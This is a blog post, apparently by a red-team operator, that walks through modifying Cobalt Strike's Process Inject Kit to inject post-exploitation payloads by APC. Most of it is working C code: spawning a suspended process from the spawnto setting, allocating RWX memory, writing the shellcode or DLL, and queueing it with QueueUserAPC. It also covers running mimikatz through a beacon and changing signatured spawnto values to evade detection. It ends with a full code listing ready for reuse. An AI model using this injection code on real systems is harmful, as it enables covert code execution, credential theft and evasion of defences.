Introduction
In this blog post I walk through a simple example of modifying Cobalt Strike’s default process injection behavior to use QueueUserAPC through the Process Inject Kit.
Cobalt Strike Post-Exploitation in a Nutshell
When you load BOFs or run tools like Mimikatz through a beacon, Cobalt Strike will either perform inline execution or a fork and run of the capability.
- Inline execution: Usually for BOFs, pushed to the beacon and executed within the beacon’s process. Local process memory allocation and injection occurs here.
- Fork and run: Spawns a temporary process and injects a DLL into that process. The DLL contains the corresponding capability and is reflectively loaded into the temporary process.
Fork and run commands have two variants:
- Process injection spawn: spawns a temporary process, defined by the “spawnto” setting (e.g. when using the spawn command)
- Process injection explicit: injects into an existing process (e.g. when using shinject, where you need to specify a remote process ID)
These two variants are handled by the BeaconInjectTemporaryProcess and BeaconInjectProcess internal beacon APIs respectively, which provide a layer of abstraction over the actual process injection methods being used.
Before Cobalt Strike 4.5, the only way to modify the process injection techniques was through the teamserver’s C2 profile, which didn’t provide much customizability. Now, Cobalt Strike comes with a Process Inject Kit that allows operators to customize the process injection methods used by these fork and run commands.
Goals
My goal was to implement QueueUserAPC into Cobalt Strike beacons using the Process Inject Kit.
QueueUserAPC allows an application to queue an Asynchronous Procedure Call (APC) to a thread. Once the thread is in an alertable state, the APC is executed. QueueUserAPC also works with suspended threads, as long as the thread is resumed later.
In malware, the APC is usually a pointer to some shellcode, meaning that once the thread is alerted, the shellcode executes.
Since QueueUserAPC requires an alertable or suspended thread, one of the main ways to perform QueueUserAPC is to create a suspended process so that all of its threads are suspended. We can then queue an APC to the suspended process’s main thread, then resume that thread to execute the shellcode.
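The queueing behavior described above can be illustrated with a toy model in portable C. This is only a sketch of the semantics (queued callbacks sit idle until the thread is resumed and becomes alertable); it does not call any Windows API, and every name in it (`toy_thread`, `toy_queue_apc`, `toy_enter_alertable`, `toy_resume`, `toy_add`) is hypothetical.

```c
#include <stddef.h>

/* Toy model of a per-thread APC queue. Hypothetical names, no Windows APIs. */
#define TOY_APC_MAX 8

typedef void (*toy_apc_fn)(unsigned long data);

typedef struct {
    toy_apc_fn    fn[TOY_APC_MAX];   /* queued callbacks, FIFO order   */
    unsigned long data[TOY_APC_MAX]; /* argument passed to each one    */
    size_t        count;             /* number of pending callbacks    */
    int           suspended;         /* 1 while the thread is suspended */
} toy_thread;

/* Queue a callback on the thread. Returns nonzero on success and 0 when
 * the queue is full, loosely mirroring a nonzero-on-success convention. */
int toy_queue_apc(toy_thread *t, toy_apc_fn fn, unsigned long data) {
    if (t->count >= TOY_APC_MAX) {
        return 0;
    }
    t->fn[t->count] = fn;
    t->data[t->count] = data;
    t->count++;
    return 1;
}

/* Mark the thread as runnable again. */
void toy_resume(toy_thread *t) {
    t->suspended = 0;
}

/* Model the thread entering an alertable state: a suspended thread runs
 * nothing; otherwise every pending callback runs once, in FIFO order.
 * Returns the number of callbacks that ran. */
size_t toy_enter_alertable(toy_thread *t) {
    if (t->suspended) {
        return 0;
    }
    size_t ran = t->count;
    for (size_t i = 0; i < ran; i++) {
        t->fn[i](t->data[i]);
    }
    t->count = 0;
    return ran;
}

/* Example callback: accumulates its argument into a global. */
unsigned long toy_sum = 0;
void toy_add(unsigned long data) {
    toy_sum += data;
}
```

In this model, queueing `toy_add` on a suspended `toy_thread` has no visible effect until `toy_resume` is called and the thread next enters an alertable state, which is the ordering the rest of this post relies on.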
The Process Inject Kit comes with two .c files, process_inject_spawn.c and process_inject_explicit.c, which contain code to perform their associated fork and run technique.
I decided to go with process_inject_spawn.c for this case, which spawns a temporary process to execute our capabilities. We can alter this code to get our process to spawn in a suspended state and perform QueueUserAPC against it.
Customizing Process Spawning
The code currently uses BeaconSpawnTemporaryProcess, which accounts for things like PPIDs, process architecture, and other Beacon-related data, but doesn’t provide options to create the process in a suspended state.
if (!BeaconSpawnTemporaryProcess(x86, ignoreToken, &si, &pi)) {
BeaconPrintf(CALLBACK_ERROR, "Unable to spawn %s temporary process.", x86 ? "x86" : "x64");
return;
}
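We need to call WinAPIs like CreateProcessA directly for our case.
Because the kit’s code is compiled as a BOF, every WinAPI we use, such as CreateProcessA, has to be declared with the LIBRARY$Function naming convention. We do this by adding something like the following to the top of the file: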
DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$CreateProcessA (
LPCSTR lpApplicationName,
LPSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCSTR lpCurrentDirectory,
LPSTARTUPINFOA lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation);
And then in our code, we can call CreateProcessA by using the following:
// CreateProcess in suspended state
char cmd[] = "notepad.exe";
BOOL success = KERNEL32$CreateProcessA(
NULL,
cmd,
NULL,
NULL,
FALSE,
CREATE_NO_WINDOW | CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi);
if (!success) {
BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
return;
}
Getting the spawnto Value
By default, when running a fork and run command using the “spawn” method, Cobalt Strike will spawn rundll32.exe and go on from there. This is the default spawnto value of the Cobalt Strike teamserver.
However, this is heavily signatured, so it’s common to see operators change this value to something else. We can do this within the beacon by running the command:
spawnto x64 %windir%\sysnative\notepad.exe
Or for the entire teamserver in the C2 profile:
post-ex {
set spawnto_x86 "%windir%\\syswow64\\notepad.exe";
set spawnto_x64 "%windir%\\sysnative\\notepad.exe";
}
We want to make sure that our custom process injection method is consistent with this setting, so we use the BeaconGetSpawnTo function, which is defined in beacon.h.
void BeaconGetSpawnTo(
BOOL x86,
char * buffer,
int length
);
BeaconGetSpawnTo has three parameters:
- x86 determines whether the spawnto value is associated with the x64 or x86 setting
- buffer is the char buffer that will store the spawnto value
- length appears to be the size of the char buffer, although I couldn’t confirm this.
I looked at some GitHub repos of this implementation and found one that defines a constant MAX_PATH_LENGTH as 1000 and just uses it for BeaconGetSpawnTo. So I included that in my code.
// define MAX_PATH_LENGTH at top of file
#define MAX_PATH_LENGTH 1000
// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);
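To make the buffer-plus-length calling pattern concrete, here is a small sketch of how a function with this shape might treat its length argument. It is an assumption for illustration only: `toy_get_spawn_to` is a hypothetical stand-in, not the real BeaconGetSpawnTo, whose internal behavior isn’t covered here.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for a "fill this buffer" API. It copies at most
 * length - 1 bytes of the configured value into buffer and always
 * NUL-terminates. Returns 1 if the whole value fit, 0 if it was
 * truncated or the arguments were unusable. */
int toy_get_spawn_to(const char *configured, char *buffer, int length) {
    if (configured == NULL || buffer == NULL || length <= 0) {
        return 0;
    }
    size_t need = strlen(configured);   /* bytes we would like to copy   */
    size_t room = (size_t)length - 1;   /* space left after the NUL byte */
    size_t n = need < room ? need : room;

    memcpy(buffer, configured, n);
    buffer[n] = '\0';
    return need <= room;
}
```

Under this assumption, passing the declared size of the array (as done above with MAX_PATH_LENGTH) means the callee can never write past the end of the buffer, and a generously sized buffer avoids truncating long paths.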
We can now use this spawnto value in our CreateProcessA call:
// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);
// CreateProcess in suspended state
BOOL success = KERNEL32$CreateProcessA(
NULL,
spawnTo,
NULL,
NULL,
FALSE,
CREATE_NO_WINDOW | CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi);
if (!success) {
BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
return;
}
Allocating and Copying Memory
Before we call QueueUserAPC, we need to allocate memory in the remote process and copy our shellcode into that allocation. For this I decided to go with the good ol’ VirtualAllocEx and WriteProcessMemory.
// allocate memory
LPVOID remoteBuffer = KERNEL32$VirtualAllocEx(
pi.hProcess,
NULL,
dllLen,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
if (remoteBuffer == NULL) {
BeaconPrintf(CALLBACK_ERROR, "VirtualAllocEx failed.");
return;
}
BeaconPrintf(CALLBACK_OUTPUT, "[+] Remote buffer at 0x%p", remoteBuffer);
// write memory
SIZE_T bytesWritten;
success = KERNEL32$WriteProcessMemory(
pi.hProcess,
remoteBuffer,
dllPtr,
dllLen,
&bytesWritten);
if (!success) {
BeaconPrintf(CALLBACK_ERROR, "WriteProcessMemory failed.");
return;
}
QueueUserAPC
After creating a suspended process and allocating and copying memory into that process, we can finally perform QueueUserAPC against the suspended main thread of the process.
It’s actually pretty easy to do. We just need to call QueueUserAPC with a pointer to the remote shellcode and a handle to the remote, suspended thread. We then call ResumeThread to allow the thread to execute our shellcode.
// QueueUserAPC
DWORD queueUserApcResult = KERNEL32$QueueUserAPC(
(PAPCFUNC)remoteBuffer,
pi.hThread,
0);
if (queueUserApcResult == 0) {
BeaconPrintf(CALLBACK_ERROR, "QueueUserAPC failed.");
return;
}
KERNEL32$ResumeThread(pi.hThread);
Examining Process Memory
We can build the kit with build.sh, which produces a .cna file that we can load into our teamserver.
$ ./build.sh /opt/cobaltstrike/custom-inject-output
[Process Inject kit] [+] You have a x86_64 mingw--I will recompile the process inject beacon object files
[Process Inject kit] [*] Compile process_inject_spawn.x64.o
[Process Inject kit] [*] Compile process_inject_spawn.x86.o
[Process Inject kit] [*] Compile process_inject_explicit.x64.o
[Process Inject kit] [*] Compile process_inject_explicit.x86.o
[Process Inject kit] [+] The Process inject object files are saved in '/opt/cobaltstrike/custom-inject-output'
Since I was calling VirtualAllocEx with RWX memory permissions, I wanted to see what it would look like in Process Hacker to confirm that the WinAPIs were being used properly.
I ran mimikatz standard::sleep 80000 on the beacon, since running mimikatz is one of the commands that uses the fork and run method.
Examining the memory contents, it seemed that the region had been freed.
This was because I had the cleanup setting set to true in my malleable C2 profile, so I switched that to false and ran the mimikatz command again.
And there it is! The RWX region confirms that my VirtualAllocEx call is being used and my code isn’t broken.
Code Snippets
Imports and constants:
#define MAX_PATH_LENGTH 1000
DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$CreateProcessA (
LPCSTR lpApplicationName,
LPSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCSTR lpCurrentDirectory,
LPSTARTUPINFOA lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation);
DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$QueueUserAPC (
PAPCFUNC pfnAPC,
HANDLE hThread,
ULONG_PTR dwData);
DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$ResumeThread (
HANDLE hThread);
DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$VirtualAllocEx (
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect);
DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$WriteProcessMemory (
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten);
QueueUserAPC implementation:
/* begin QueueUserAPC implementation */
// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);
// CreateProcess in suspended state
BOOL success = KERNEL32$CreateProcessA(
NULL,
spawnTo,
NULL,
NULL,
FALSE,
CREATE_NO_WINDOW | CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi);
if (!success) {
BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
return;
}
BeaconPrintf(CALLBACK_OUTPUT, "[+] Process ID of spawned process: %d", pi.dwProcessId);
// allocate memory
LPVOID remoteBuffer = KERNEL32$VirtualAllocEx(
pi.hProcess,
NULL,
dllLen,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
if (remoteBuffer == NULL) {
BeaconPrintf(CALLBACK_ERROR, "VirtualAllocEx failed.");
return;
}
BeaconPrintf(CALLBACK_OUTPUT, "[+] Remote buffer at 0x%p", remoteBuffer);
// write memory
SIZE_T bytesWritten;
success = KERNEL32$WriteProcessMemory(
pi.hProcess,
remoteBuffer,
dllPtr,
dllLen,
&bytesWritten);
if (!success) {
BeaconPrintf(CALLBACK_ERROR, "WriteProcessMemory failed.");
return;
}
// QueueUserAPC
DWORD queueUserApcResult = KERNEL32$QueueUserAPC(
(PAPCFUNC)remoteBuffer,
pi.hThread,
0);
if (queueUserApcResult == 0) {
BeaconPrintf(CALLBACK_ERROR, "QueueUserAPC failed.");
return;
}
KERNEL32$ResumeThread(pi.hThread);